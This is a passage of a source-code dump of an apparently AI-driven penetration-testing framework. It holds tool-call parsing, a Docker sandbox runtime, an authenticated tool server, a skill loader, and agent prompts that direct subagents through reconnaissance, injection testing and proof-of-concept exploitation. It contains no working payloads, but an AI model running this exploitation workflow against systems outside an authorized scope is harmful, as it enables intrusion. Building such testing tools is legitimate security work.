_PARAM_NAME_ATTR.sub(r\"\", content)\n content = content.replace(\"\", \"\")\n\n return _STRIP_TAG_QUOTES.sub(\n lambda m: f\"<{m.group(1)}={m.group(2).strip().strip(chr(34) + chr(39))}>\", content\n )\n\n\nSTRIX_MODEL_MAP: dict[str, str] = {\n \"claude-sonnet-4.6\": \"anthropic/claude-sonnet-4-6\",\n \"claude-opus-4.6\": \"anthropic/claude-opus-4-6\",\n \"gpt-5.2\": \"openai/gpt-5.2\",\n \"gpt-5.1\": \"openai/gpt-5.1\",\n \"gpt-5\": \"openai/gpt-5\",\n \"gemini-3-pro-preview\": \"gemini/gemini-3-pro-preview\",\n \"gemini-3-flash-preview\": \"gemini/gemini-3-flash-preview\",\n \"glm-5\": \"openrouter/z-ai/glm-5\",\n \"glm-4.7\": \"openrouter/z-ai/glm-4.7\",\n}\n\n\ndef resolve_strix_model(model_name: str | None) -> tuple[str | None, str | None]:\n \"\"\"Resolve a strix/ model into names for API calls and capability lookups.\n\n Returns (api_model, canonical_model):\n - api_model: openai/ for API calls (Strix API is OpenAI-compatible)\n - canonical_model: actual provider model name for litellm capability lookups\n Non-strix models return the same name for both.\n \"\"\"\n if not model_name or not model_name.startswith(\"strix/\"):\n return model_name, model_name\n\n base_model = model_name[6:]\n api_model = f\"openai/{base_model}\"\n canonical_model = STRIX_MODEL_MAP.get(base_model, api_model)\n return api_model, canonical_model\n\n\ndef _truncate_to_first_function(content: str) -> str:\n if not content:\n return content\n\n function_starts = [\n match.start() for match in re.finditer(r\"= 2:\n second_function_start = function_starts[1]\n\n return content[:second_function_start].rstrip()\n\n return content\n\n\ndef parse_tool_invocations(content: str) -> list[dict[str, Any]] | None:\n content = normalize_tool_format(content)\n content = fix_incomplete_tool_call(content)\n\n tool_invocations: list[dict[str, Any]] = []\n\n fn_regex_pattern = r\"]+)>\\n?(.*?)\"\n fn_param_regex_pattern = r\"]+)>(.*?)\"\n\n fn_matches = re.finditer(fn_regex_pattern, content, re.DOTALL)\n\n for fn_match in fn_matches:\n fn_name = fn_match.group(1)\n fn_body = fn_match.group(2)\n\n param_matches = re.finditer(fn_param_regex_pattern, fn_body, re.DOTALL)\n\n args = {}\n for param_match in param_matches:\n param_name = param_match.group(1)\n param_value = param_match.group(2).strip()\n\n param_value = html.unescape(param_value)\n args[param_name] = param_value\n\n tool_invocations.append({\"toolName\": fn_name, \"args\": args})\n\n return tool_invocations if tool_invocations else None\n\n\ndef fix_incomplete_tool_call(content: str) -> str:\n \"\"\"Fix incomplete tool calls by adding missing closing tag.\n\n Handles both ```` and ```` formats.\n \"\"\"\n has_open = \"\" in content or \"\" in content\n if has_open and count_open == 1 and not has_close:\n content = content.rstrip()\n content = content + \"function>\" if content.endswith(\"\"\n return content\n\n\ndef format_tool_call(tool_name: str, args: dict[str, Any]) -> str:\n xml_parts = [f\"\"]\n\n for key, value in args.items():\n xml_parts.append(f\"{value}\")\n\n xml_parts.append(\"\")\n\n return \"\\n\".join(xml_parts)\n\n\ndef clean_content(content: str) -> str:\n if not content:\n return \"\"\n\n content = normalize_tool_format(content)\n content = fix_incomplete_tool_call(content)\n\n tool_pattern = r\"]+>.*?\"\n cleaned = re.sub(tool_pattern, \"\", content, flags=re.DOTALL)\n\n incomplete_tool_pattern = r\"]+>.*$\"\n cleaned = re.sub(incomplete_tool_pattern, \"\", cleaned, flags=re.DOTALL)\n\n partial_tag_pattern = r\"]*)?)?)?)?)?)?)?)?)?$\"\n cleaned = re.sub(partial_tag_pattern, \"\", cleaned)\n\n hidden_xml_patterns = [\n r\".*?\",\n r\".*?\",\n ]\n for pattern in hidden_xml_patterns:\n cleaned = re.sub(pattern, \"\", cleaned, flags=re.DOTALL | re.IGNORECASE)\n\n cleaned = re.sub(r\"\\n\\s*\\n\", \"\\n\\n\", cleaned)\n\n return cleaned.strip()\n" }, { "path": "strix/runtime/__init__.py", "content": "from strix.config import Config\n\nfrom .runtime import AbstractRuntime\n\n\nclass SandboxInitializationError(Exception):\n \"\"\"Raised when sandbox initialization fails (e.g., Docker issues).\"\"\"\n\n def __init__(self, message: str, details: str | None = None):\n super().__init__(message)\n self.message = message\n self.details = details\n\n\n_global_runtime: AbstractRuntime | None = None\n\n\ndef get_runtime() -> AbstractRuntime:\n global _global_runtime # noqa: PLW0603\n\n runtime_backend = Config.get(\"strix_runtime_backend\")\n\n if runtime_backend == \"docker\":\n from .docker_runtime import DockerRuntime\n\n if _global_runtime is None:\n _global_runtime = DockerRuntime()\n return _global_runtime\n\n raise ValueError(\n f\"Unsupported runtime backend: {runtime_backend}. Only 'docker' is supported for now.\"\n )\n\n\ndef cleanup_runtime() -> None:\n global _global_runtime # noqa: PLW0603\n\n if _global_runtime is not None:\n _global_runtime.cleanup()\n _global_runtime = None\n\n\n__all__ = [\"AbstractRuntime\", \"SandboxInitializationError\", \"cleanup_runtime\", \"get_runtime\"]\n" }, { "path": "strix/runtime/docker_runtime.py", "content": "import contextlib\nimport os\nimport secrets\nimport socket\nimport time\nfrom pathlib import Path\nfrom typing import cast\n\nimport docker\nimport httpx\nfrom docker.errors import DockerException, ImageNotFound, NotFound\nfrom docker.models.containers import Container\nfrom requests.exceptions import ConnectionError as RequestsConnectionError\nfrom requests.exceptions import Timeout as RequestsTimeout\n\nfrom strix.config import Config\n\nfrom . import SandboxInitializationError\nfrom .runtime import AbstractRuntime, SandboxInfo\n\n\nHOST_GATEWAY_HOSTNAME = \"host.docker.internal\"\nDOCKER_TIMEOUT = 60\nCONTAINER_TOOL_SERVER_PORT = 48081\nCONTAINER_CAIDO_PORT = 48080\n\n\nclass DockerRuntime(AbstractRuntime):\n def __init__(self) -> None:\n try:\n self.client = docker.from_env(timeout=DOCKER_TIMEOUT)\n except (DockerException, RequestsConnectionError, RequestsTimeout) as e:\n raise SandboxInitializationError(\n \"Docker is not available\",\n \"Please ensure Docker Desktop is installed and running.\",\n ) from e\n\n self._scan_container: Container | None = None\n self._tool_server_port: int | None = None\n self._tool_server_token: str | None = None\n self._caido_port: int | None = None\n\n def _find_available_port(self) -> int:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((\"\", 0))\n return cast(\"int\", s.getsockname()[1])\n\n def _get_scan_id(self, agent_id: str) -> str:\n try:\n from strix.telemetry.tracer import get_global_tracer\n\n tracer = get_global_tracer()\n if tracer and tracer.scan_config:\n return str(tracer.scan_config.get(\"scan_id\", \"default-scan\"))\n except (ImportError, AttributeError):\n pass\n return f\"scan-{agent_id.split('-')[0]}\"\n\n def _verify_image_available(self, image_name: str, max_retries: int = 3) -> None:\n for attempt in range(max_retries):\n try:\n image = self.client.images.get(image_name)\n if not image.id or not image.attrs:\n raise ImageNotFound(f\"Image {image_name} metadata incomplete\") # noqa: TRY301\n except (ImageNotFound, DockerException):\n if attempt == max_retries - 1:\n raise\n time.sleep(2**attempt)\n else:\n return\n\n def _recover_container_state(self, container: Container) -> None:\n for env_var in container.attrs[\"Config\"][\"Env\"]:\n if env_var.startswith(\"TOOL_SERVER_TOKEN=\"):\n self._tool_server_token = env_var.split(\"=\", 1)[1]\n break\n\n port_bindings = container.attrs.get(\"NetworkSettings\", {}).get(\"Ports\", {})\n port_key = f\"{CONTAINER_TOOL_SERVER_PORT}/tcp\"\n if port_bindings.get(port_key):\n self._tool_server_port = int(port_bindings[port_key][0][\"HostPort\"])\n\n caido_port_key = f\"{CONTAINER_CAIDO_PORT}/tcp\"\n if port_bindings.get(caido_port_key):\n self._caido_port = int(port_bindings[caido_port_key][0][\"HostPort\"])\n\n def _wait_for_tool_server(self, max_retries: int = 30, timeout: int = 5) -> None:\n host = self._resolve_docker_host()\n health_url = f\"http://{host}:{self._tool_server_port}/health\"\n\n time.sleep(5)\n\n for attempt in range(max_retries):\n try:\n with httpx.Client(trust_env=False, timeout=timeout) as client:\n response = client.get(health_url)\n if response.status_code == 200:\n data = response.json()\n if data.get(\"status\") == \"healthy\":\n return\n except (httpx.ConnectError, httpx.TimeoutException, httpx.RequestError):\n pass\n\n time.sleep(min(2**attempt * 0.5, 5))\n\n raise SandboxInitializationError(\n \"Tool server failed to start\",\n \"Container initialization timed out. Please try again.\",\n )\n\n def _create_container(self, scan_id: str, max_retries: int = 2) -> Container:\n container_name = f\"strix-scan-{scan_id}\"\n image_name = Config.get(\"strix_image\")\n if not image_name:\n raise ValueError(\"STRIX_IMAGE must be configured\")\n\n self._verify_image_available(image_name)\n\n last_error: Exception | None = None\n for attempt in range(max_retries + 1):\n try:\n with contextlib.suppress(NotFound):\n existing = self.client.containers.get(container_name)\n with contextlib.suppress(Exception):\n existing.stop(timeout=5)\n existing.remove(force=True)\n time.sleep(1)\n\n self._tool_server_port = self._find_available_port()\n self._caido_port = self._find_available_port()\n self._tool_server_token = secrets.token_urlsafe(32)\n execution_timeout = Config.get(\"strix_sandbox_execution_timeout\") or \"120\"\n\n container = self.client.containers.run(\n image_name,\n command=\"sleep infinity\",\n detach=True,\n name=container_name,\n hostname=container_name,\n ports={\n f\"{CONTAINER_TOOL_SERVER_PORT}/tcp\": self._tool_server_port,\n f\"{CONTAINER_CAIDO_PORT}/tcp\": self._caido_port,\n },\n cap_add=[\"NET_ADMIN\", \"NET_RAW\"],\n labels={\"strix-scan-id\": scan_id},\n environment={\n \"PYTHONUNBUFFERED\": \"1\",\n \"TOOL_SERVER_PORT\": str(CONTAINER_TOOL_SERVER_PORT),\n \"TOOL_SERVER_TOKEN\": self._tool_server_token,\n \"STRIX_SANDBOX_EXECUTION_TIMEOUT\": str(execution_timeout),\n \"HOST_GATEWAY\": HOST_GATEWAY_HOSTNAME,\n },\n extra_hosts={HOST_GATEWAY_HOSTNAME: \"host-gateway\"},\n tty=True,\n )\n\n self._scan_container = container\n self._wait_for_tool_server()\n\n except (DockerException, RequestsConnectionError, RequestsTimeout) as e:\n last_error = e\n if attempt < max_retries:\n self._tool_server_port = None\n self._tool_server_token = None\n self._caido_port = None\n time.sleep(2**attempt)\n else:\n return container\n\n raise SandboxInitializationError(\n \"Failed to create container\",\n f\"Container creation failed after {max_retries + 1} attempts: {last_error}\",\n ) from last_error\n\n def _get_or_create_container(self, scan_id: str) -> Container:\n container_name = f\"strix-scan-{scan_id}\"\n\n if self._scan_container:\n try:\n self._scan_container.reload()\n if self._scan_container.status == \"running\":\n return self._scan_container\n except NotFound:\n self._scan_container = None\n self._tool_server_port = None\n self._tool_server_token = None\n self._caido_port = None\n\n try:\n container = self.client.containers.get(container_name)\n container.reload()\n\n if container.status != \"running\":\n container.start()\n time.sleep(2)\n\n self._scan_container = container\n self._recover_container_state(container)\n except NotFound:\n pass\n else:\n return container\n\n try:\n containers = self.client.containers.list(\n all=True, filters={\"label\": f\"strix-scan-id={scan_id}\"}\n )\n if containers:\n container = containers[0]\n if container.status != \"running\":\n container.start()\n time.sleep(2)\n\n self._scan_container = container\n self._recover_container_state(container)\n return container\n except DockerException:\n pass\n\n return self._create_container(scan_id)\n\n def _copy_local_directory_to_container(\n self, container: Container, local_path: str, target_name: str | None = None\n ) -> None:\n import tarfile\n from io import BytesIO\n\n try:\n local_path_obj = Path(local_path).resolve()\n if not local_path_obj.exists() or not local_path_obj.is_dir():\n return\n\n tar_buffer = BytesIO()\n with tarfile.open(fileobj=tar_buffer, mode=\"w\") as tar:\n for item in local_path_obj.rglob(\"*\"):\n if item.is_file():\n rel_path = item.relative_to(local_path_obj)\n arcname = Path(target_name) / rel_path if target_name else rel_path\n tar.add(item, arcname=arcname)\n\n tar_buffer.seek(0)\n container.put_archive(\"/workspace\", tar_buffer.getvalue())\n container.exec_run(\n \"chown -R pentester:pentester /workspace && chmod -R 755 /workspace\",\n user=\"root\",\n )\n except (OSError, DockerException):\n pass\n\n async def create_sandbox(\n self,\n agent_id: str,\n existing_token: str | None = None,\n local_sources: list[dict[str, str]] | None = None,\n ) -> SandboxInfo:\n scan_id = self._get_scan_id(agent_id)\n container = self._get_or_create_container(scan_id)\n\n source_copied_key = f\"_source_copied_{scan_id}\"\n if local_sources and not hasattr(self, source_copied_key):\n for index, source in enumerate(local_sources, start=1):\n source_path = source.get(\"source_path\")\n if not source_path:\n continue\n target_name = (\n source.get(\"workspace_subdir\") or Path(source_path).name or f\"target_{index}\"\n )\n self._copy_local_directory_to_container(container, source_path, target_name)\n setattr(self, source_copied_key, True)\n\n if container.id is None:\n raise RuntimeError(\"Docker container ID is unexpectedly None\")\n\n token = existing_token or self._tool_server_token\n if self._tool_server_port is None or self._caido_port is None or token is None:\n raise RuntimeError(\"Tool server not initialized\")\n\n host = self._resolve_docker_host()\n api_url = f\"http://{host}:{self._tool_server_port}\"\n\n await self._register_agent(api_url, agent_id, token)\n\n return {\n \"workspace_id\": container.id,\n \"api_url\": api_url,\n \"auth_token\": token,\n \"tool_server_port\": self._tool_server_port,\n \"caido_port\": self._caido_port,\n \"agent_id\": agent_id,\n }\n\n async def _register_agent(self, api_url: str, agent_id: str, token: str) -> None:\n try:\n async with httpx.AsyncClient(trust_env=False) as client:\n response = await client.post(\n f\"{api_url}/register_agent\",\n params={\"agent_id\": agent_id},\n headers={\"Authorization\": f\"Bearer {token}\"},\n timeout=30,\n )\n response.raise_for_status()\n except httpx.RequestError:\n pass\n\n async def get_sandbox_url(self, container_id: str, port: int) -> str:\n try:\n self.client.containers.get(container_id)\n return f\"http://{self._resolve_docker_host()}:{port}\"\n except NotFound:\n raise ValueError(f\"Container {container_id} not found.\") from None\n\n def _resolve_docker_host(self) -> str:\n docker_host = os.getenv(\"DOCKER_HOST\", \"\")\n if docker_host:\n from urllib.parse import urlparse\n\n parsed = urlparse(docker_host)\n if parsed.scheme in (\"tcp\", \"http\", \"https\") and parsed.hostname:\n return parsed.hostname\n return \"127.0.0.1\"\n\n async def destroy_sandbox(self, container_id: str) -> None:\n try:\n container = self.client.containers.get(container_id)\n container.stop()\n container.remove()\n self._scan_container = None\n self._tool_server_port = None\n self._tool_server_token = None\n self._caido_port = None\n except (NotFound, DockerException):\n pass\n\n def cleanup(self) -> None:\n if self._scan_container is not None:\n container_name = self._scan_container.name\n self._scan_container = None\n self._tool_server_port = None\n self._tool_server_token = None\n self._caido_port = None\n\n if container_name is None:\n return\n\n import subprocess\n\n subprocess.Popen( # noqa: S603\n [\"docker\", \"rm\", \"-f\", container_name], # noqa: S607\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL,\n start_new_session=True,\n )\n" }, { "path": "strix/runtime/runtime.py", "content": "from abc import ABC, abstractmethod\nfrom typing import TypedDict\n\n\nclass SandboxInfo(TypedDict):\n workspace_id: str\n api_url: str\n auth_token: str | None\n tool_server_port: int\n caido_port: int\n agent_id: str\n\n\nclass AbstractRuntime(ABC):\n @abstractmethod\n async def create_sandbox(\n self,\n agent_id: str,\n existing_token: str | None = None,\n local_sources: list[dict[str, str]] | None = None,\n ) -> SandboxInfo:\n raise NotImplementedError\n\n @abstractmethod\n async def get_sandbox_url(self, container_id: str, port: int) -> str:\n raise NotImplementedError\n\n @abstractmethod\n async def destroy_sandbox(self, container_id: str) -> None:\n raise NotImplementedError\n\n def cleanup(self) -> None:\n raise NotImplementedError\n" }, { "path": "strix/runtime/tool_server.py", "content": "from __future__ import annotations\n\nimport argparse\nimport asyncio\nimport os\nimport signal\nimport sys\nfrom typing import Any\n\nimport uvicorn\nfrom fastapi import Depends, FastAPI, HTTPException, status\nfrom fastapi.security import HTTPAuthorizationCredentials, HTTPBearer\nfrom pydantic import BaseModel, ValidationError\n\n\nSANDBOX_MODE = os.getenv(\"STRIX_SANDBOX_MODE\", \"false\").lower() == \"true\"\nif not SANDBOX_MODE:\n raise RuntimeError(\"Tool server should only run in sandbox mode (STRIX_SANDBOX_MODE=true)\")\n\nparser = argparse.ArgumentParser(description=\"Start Strix tool server\")\nparser.add_argument(\"--token\", required=True, help=\"Authentication token\")\nparser.add_argument(\"--host\", default=\"0.0.0.0\", help=\"Host to bind to\") # nosec\nparser.add_argument(\"--port\", type=int, required=True, help=\"Port to bind to\")\nparser.add_argument(\n \"--timeout\",\n type=int,\n default=120,\n help=\"Hard timeout in seconds for each request execution (default: 120)\",\n)\n\nargs = parser.parse_args()\nEXPECTED_TOKEN = args.token\nREQUEST_TIMEOUT = args.timeout\n\napp = FastAPI()\nsecurity = HTTPBearer()\nsecurity_dependency = Depends(security)\n\nagent_tasks: dict[str, asyncio.Task[Any]] = {}\n\n\ndef verify_token(credentials: HTTPAuthorizationCredentials) -> str:\n if not credentials or credentials.scheme != \"Bearer\":\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid authentication scheme. Bearer token required.\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n\n if credentials.credentials != EXPECTED_TOKEN:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid authentication token\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n\n return credentials.credentials\n\n\nclass ToolExecutionRequest(BaseModel):\n agent_id: str\n tool_name: str\n kwargs: dict[str, Any]\n\n\nclass ToolExecutionResponse(BaseModel):\n result: Any | None = None\n error: str | None = None\n\n\nasync def _run_tool(agent_id: str, tool_name: str, kwargs: dict[str, Any]) -> Any:\n from strix.tools.argument_parser import convert_arguments\n from strix.tools.context import set_current_agent_id\n from strix.tools.registry import get_tool_by_name\n\n set_current_agent_id(agent_id)\n\n tool_func = get_tool_by_name(tool_name)\n if not tool_func:\n raise ValueError(f\"Tool '{tool_name}' not found\")\n\n converted_kwargs = convert_arguments(tool_func, kwargs)\n return await asyncio.to_thread(tool_func, **converted_kwargs)\n\n\n@app.post(\"/execute\", response_model=ToolExecutionResponse)\nasync def execute_tool(\n request: ToolExecutionRequest, credentials: HTTPAuthorizationCredentials = security_dependency\n) -> ToolExecutionResponse:\n verify_token(credentials)\n\n agent_id = request.agent_id\n\n if agent_id in agent_tasks:\n old_task = agent_tasks[agent_id]\n if not old_task.done():\n old_task.cancel()\n\n task = asyncio.create_task(\n asyncio.wait_for(\n _run_tool(agent_id, request.tool_name, request.kwargs), timeout=REQUEST_TIMEOUT\n )\n )\n agent_tasks[agent_id] = task\n\n try:\n result = await task\n return ToolExecutionResponse(result=result)\n\n except asyncio.CancelledError:\n return ToolExecutionResponse(error=\"Cancelled by newer request\")\n\n except TimeoutError:\n return ToolExecutionResponse(error=f\"Tool timed out after {REQUEST_TIMEOUT}s\")\n\n except ValidationError as e:\n return ToolExecutionResponse(error=f\"Invalid arguments: {e}\")\n\n except (ValueError, RuntimeError, ImportError) as e:\n return ToolExecutionResponse(error=f\"Tool execution error: {e}\")\n\n except Exception as e: # noqa: BLE001\n return ToolExecutionResponse(error=f\"Unexpected error: {e}\")\n\n finally:\n if agent_tasks.get(agent_id) is task:\n del agent_tasks[agent_id]\n\n\n@app.post(\"/register_agent\")\nasync def register_agent(\n agent_id: str, credentials: HTTPAuthorizationCredentials = security_dependency\n) -> dict[str, str]:\n verify_token(credentials)\n return {\"status\": \"registered\", \"agent_id\": agent_id}\n\n\n@app.get(\"/health\")\nasync def health_check() -> dict[str, Any]:\n return {\n \"status\": \"healthy\",\n \"sandbox_mode\": str(SANDBOX_MODE),\n \"environment\": \"sandbox\" if SANDBOX_MODE else \"main\",\n \"auth_configured\": \"true\" if EXPECTED_TOKEN else \"false\",\n \"active_agents\": len(agent_tasks),\n \"agents\": list(agent_tasks.keys()),\n }\n\n\ndef signal_handler(_signum: int, _frame: Any) -> None:\n if hasattr(signal, \"SIGPIPE\"):\n signal.signal(signal.SIGPIPE, signal.SIG_IGN)\n for task in agent_tasks.values():\n task.cancel()\n sys.exit(0)\n\n\nif hasattr(signal, \"SIGPIPE\"):\n signal.signal(signal.SIGPIPE, signal.SIG_IGN)\n\nsignal.signal(signal.SIGTERM, signal_handler)\nsignal.signal(signal.SIGINT, signal_handler)\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=args.host, port=args.port, log_level=\"info\")\n" }, { "path": "strix/skills/README.md", "content": "# πŸ“š Strix Skills\n\n## 🎯 Overview\n\nSkills are specialized knowledge packages that enhance Strix agents with deep expertise in specific vulnerability types, technologies, and testing methodologies. Each skill provides advanced techniques, practical examples, and validation methods that go beyond baseline security knowledge.\n\n---\n\n## πŸ—οΈ Architecture\n\n### How Skills Work\n\nWhen an agent is created, it can load up to 5 specialized skills relevant to the specific subtask and context at hand:\n\n```python\n# Agent creation with specialized skills\ncreate_agent(\n task=\"Test authentication mechanisms in API\",\n name=\"Auth Specialist\",\n skills=\"authentication_jwt,business_logic\"\n)\n```\n\nThe skills are dynamically injected into the agent's system prompt, allowing it to operate with deep expertise tailored to the specific vulnerability types or technologies required for the task at hand.\n\n---\n\n## πŸ“ Skill Categories\n\n| Category | Purpose |\n|----------|---------|\n| **`/vulnerabilities`** | Advanced testing techniques for core vulnerability classes like authentication bypasses, business logic flaws, and race conditions |\n| **`/frameworks`** | Specific testing methods for popular frameworks e.g. Django, Express, FastAPI, and Next.js |\n| **`/technologies`** | Specialized techniques for third-party services such as Supabase, Firebase, Auth0, and payment gateways |\n| **`/protocols`** | Protocol-specific testing patterns for GraphQL, WebSocket, OAuth, and other communication standards |\n| **`/tooling`** | Command-line playbooks for core sandbox tools (nmap, nuclei, httpx, ffuf, subfinder, naabu, katana, sqlmap) |\n| **`/cloud`** | Cloud provider security testing for AWS, Azure, GCP, and Kubernetes environments |\n| **`/reconnaissance`** | Advanced information gathering and enumeration techniques for comprehensive attack surface mapping |\n| **`/custom`** | Community-contributed skills for specialized or industry-specific testing scenarios |\n\n---\n\n## 🎨 Creating New Skills\n\n### What Should a Skill Contain?\n\nA good skill is a structured knowledge package that typically includes:\n\n- **Advanced techniques** - Non-obvious methods specific to the task and domain\n- **Practical examples** - Working payloads, commands, or test cases with variations\n- **Validation methods** - How to confirm findings and avoid false positives\n- **Context-specific insights** - Environment and version nuances, configuration-dependent behavior, and edge cases\n- **YAML frontmatter** - `name` and `description` fields for skill metadata\n\nSkills focus on deep, specialized knowledge to significantly enhance agent capabilities. They are dynamically injected into agent context when needed.\n\n---\n\n## 🀝 Contributing\n\nCommunity contributions are more than welcome β€” contribute new skills via [pull requests](https://github.com/usestrix/strix/pulls) or [GitHub issues](https://github.com/usestrix/strix/issues) to help expand the collection and improve extensibility for Strix agents.\n\n---\n\n> [!NOTE]\n> **Work in Progress** - We're actively expanding the skills collection with specialized techniques and new categories.\n" }, { "path": "strix/skills/__init__.py", "content": "import re\n\nfrom strix.utils.resource_paths import get_strix_resource_path\n\n\n_EXCLUDED_CATEGORIES = {\"scan_modes\", \"coordination\"}\n_FRONTMATTER_PATTERN = re.compile(r\"^---\\s*\\n.*?\\n---\\s*\\n\", re.DOTALL)\n\n\ndef get_available_skills() -> dict[str, list[str]]:\n skills_dir = get_strix_resource_path(\"skills\")\n available_skills: dict[str, list[str]] = {}\n\n if not skills_dir.exists():\n return available_skills\n\n for category_dir in skills_dir.iterdir():\n if category_dir.is_dir() and not category_dir.name.startswith(\"__\"):\n category_name = category_dir.name\n\n if category_name in _EXCLUDED_CATEGORIES:\n continue\n\n skills = []\n\n for file_path in category_dir.glob(\"*.md\"):\n skill_name = file_path.stem\n skills.append(skill_name)\n\n if skills:\n available_skills[category_name] = sorted(skills)\n\n return available_skills\n\n\ndef get_all_skill_names() -> set[str]:\n all_skills = set()\n for category_skills in get_available_skills().values():\n all_skills.update(category_skills)\n return all_skills\n\n\ndef validate_skill_names(skill_names: list[str]) -> dict[str, list[str]]:\n available_skills = get_all_skill_names()\n valid_skills = []\n invalid_skills = []\n\n for skill_name in skill_names:\n if skill_name in available_skills:\n valid_skills.append(skill_name)\n else:\n invalid_skills.append(skill_name)\n\n return {\"valid\": valid_skills, \"invalid\": invalid_skills}\n\n\ndef parse_skill_list(skills: str | None) -> list[str]:\n if not skills:\n return []\n return [s.strip() for s in skills.split(\",\") if s.strip()]\n\n\ndef validate_requested_skills(skill_list: list[str], max_skills: int = 5) -> str | None:\n if len(skill_list) > max_skills:\n return \"Cannot specify more than 5 skills for an agent (use comma-separated format)\"\n\n if not skill_list:\n return None\n\n validation = validate_skill_names(skill_list)\n if validation[\"invalid\"]:\n available_skills = list(get_all_skill_names())\n return (\n f\"Invalid skills: {validation['invalid']}. \"\n f\"Available skills: {', '.join(available_skills)}\"\n )\n\n return None\n\n\ndef generate_skills_description() -> str:\n available_skills = get_available_skills()\n\n if not available_skills:\n return \"No skills available\"\n\n all_skill_names = get_all_skill_names()\n\n if not all_skill_names:\n return \"No skills available\"\n\n sorted_skills = sorted(all_skill_names)\n skills_str = \", \".join(sorted_skills)\n\n description = f\"List of skills to load for this agent (max 5). Available skills: {skills_str}. \"\n\n example_skills = sorted_skills[:2]\n if example_skills:\n example = f\"Example: {', '.join(example_skills)} for specialized agent\"\n description += example\n\n return description\n\n\ndef _get_all_categories() -> dict[str, list[str]]:\n \"\"\"Get all skill categories including internal ones (scan_modes, coordination).\"\"\"\n skills_dir = get_strix_resource_path(\"skills\")\n all_categories: dict[str, list[str]] = {}\n\n if not skills_dir.exists():\n return all_categories\n\n for category_dir in skills_dir.iterdir():\n if category_dir.is_dir() and not category_dir.name.startswith(\"__\"):\n category_name = category_dir.name\n skills = []\n\n for file_path in category_dir.glob(\"*.md\"):\n skill_name = file_path.stem\n skills.append(skill_name)\n\n if skills:\n all_categories[category_name] = sorted(skills)\n\n return all_categories\n\n\ndef load_skills(skill_names: list[str]) -> dict[str, str]:\n import logging\n\n logger = logging.getLogger(__name__)\n skill_content = {}\n skills_dir = get_strix_resource_path(\"skills\")\n\n all_categories = _get_all_categories()\n\n for skill_name in skill_names:\n try:\n skill_path = None\n\n if \"/\" in skill_name:\n skill_path = f\"{skill_name}.md\"\n else:\n for category, skills in all_categories.items():\n if skill_name in skills:\n skill_path = f\"{category}/{skill_name}.md\"\n break\n\n if not skill_path:\n root_candidate = f\"{skill_name}.md\"\n if (skills_dir / root_candidate).exists():\n skill_path = root_candidate\n\n if skill_path and (skills_dir / skill_path).exists():\n full_path = skills_dir / skill_path\n var_name = skill_name.split(\"/\")[-1]\n content = full_path.read_text(encoding=\"utf-8\")\n content = _FRONTMATTER_PATTERN.sub(\"\", content).lstrip()\n skill_content[var_name] = content\n logger.info(f\"Loaded skill: {skill_name} -> {var_name}\")\n else:\n logger.warning(f\"Skill not found: {skill_name}\")\n\n except (FileNotFoundError, OSError, ValueError) as e:\n logger.warning(f\"Failed to load skill {skill_name}: {e}\")\n\n return skill_content\n" }, { "path": "strix/skills/cloud/.gitkeep", "content": "" }, { "path": "strix/skills/coordination/root_agent.md", "content": "---\nname: root-agent\ndescription: Orchestration layer that coordinates specialized subagents for security assessments\n---\n\n# Root Agent\n\nOrchestration layer for security assessments. This agent coordinates specialized subagents but does not perform testing directly.\n\nYou can create agents throughout the testing processβ€”not just at the beginning. Spawn agents dynamically based on findings and evolving scope.\n\n## Role\n\n- Decompose targets into discrete, parallelizable tasks\n- Spawn and monitor specialized subagents\n- Aggregate findings into a cohesive final report\n- Manage dependencies and handoffs between agents\n\n## Scope Decomposition\n\nBefore spawning agents, analyze the target:\n\n1. **Identify attack surfaces** - web apps, APIs, infrastructure, etc.\n2. **Define boundaries** - in-scope domains, IP ranges, excluded assets\n3. **Determine approach** - blackbox, greybox, or whitebox assessment\n4. **Prioritize by risk** - critical assets and high-value targets first\n\n## Agent Architecture\n\nStructure agents by function:\n\n**Reconnaissance**\n- Asset discovery and enumeration\n- Technology fingerprinting\n- Attack surface mapping\n\n**Vulnerability Assessment**\n- Injection testing (SQLi, XSS, command injection)\n- Authentication and session analysis\n- Access control testing (IDOR, privilege escalation)\n- Business logic flaws\n- Infrastructure vulnerabilities\n\n**Exploitation and Validation**\n- Proof-of-concept development\n- Impact demonstration\n- Vulnerability chaining\n\n**Reporting**\n- Finding documentation\n- Remediation recommendations\n\n## Coordination Principles\n\n**Task Independence**\n\nCreate agents with minimal dependencies. Parallel execution is faster than sequential.\n\n**Clear Objectives**\n\nEach agent should have a specific, measurable goal. Vague objectives lead to scope creep and redundant work.\n\n**Avoid Duplication**\n\nBefore creating agents:\n1. Analyze the target scope and break into independent tasks\n2. Check existing agents to avoid overlap\n3. Create agents with clear, specific objectives\n\n**Hierarchical Delegation**\n\nComplex findings warrant specialized subagents:\n- Discovery agent finds potential vulnerability\n- Validation agent confirms exploitability\n- Reporting agent documents with reproduction steps\n- Fix agent provides remediation (if needed)\n\n**Resource Efficiency**\n\n- Avoid duplicate coverage across agents\n- Terminate agents when objectives are met or no longer relevant\n- Use message passing only when essential (requests/answers, critical handoffs)\n- Prefer batched updates over routine status messages\n\n## Completion\n\nWhen all agents report completion:\n\n1. Collect and deduplicate findings across agents\n2. Assess overall security posture\n3. Compile executive summary with prioritized recommendations\n4. Invoke finish tool with final report\n" }, { "path": "strix/skills/custom/.gitkeep", "content": "" }, { "path": "strix/skills/frameworks/fastapi.md", "content": "---\nname: fastapi\ndescription: Security testing playbook for FastAPI applications covering ASGI, dependency injection, and API vulnerabilities\n---\n\n# FastAPI\n\nSecurity testing for FastAPI/Starlette applications. Focus on dependency injection flaws, middleware gaps, and authorization drift across routers and channels.\n\n## Attack Surface\n\n**Core Components**\n- ASGI middlewares: CORS, TrustedHost, ProxyHeaders, Session, exception handlers, lifespan events\n- Routers and sub-apps: APIRouter prefixes/tags, mounted apps (StaticFiles, admin), `include_router`, versioned paths\n- Dependency injection: `Depends`, `Security`, `OAuth2PasswordBearer`, `HTTPBearer`, scopes\n\n**Data Handling**\n- Pydantic models: v1/v2, unions/Annotated, custom validators, extra fields policy, coercion\n- File operations: UploadFile, File, FileResponse, StaticFiles mounts\n- Templates: Jinja2Templates rendering\n\n**Channels**\n- HTTP (sync/async), WebSocket, 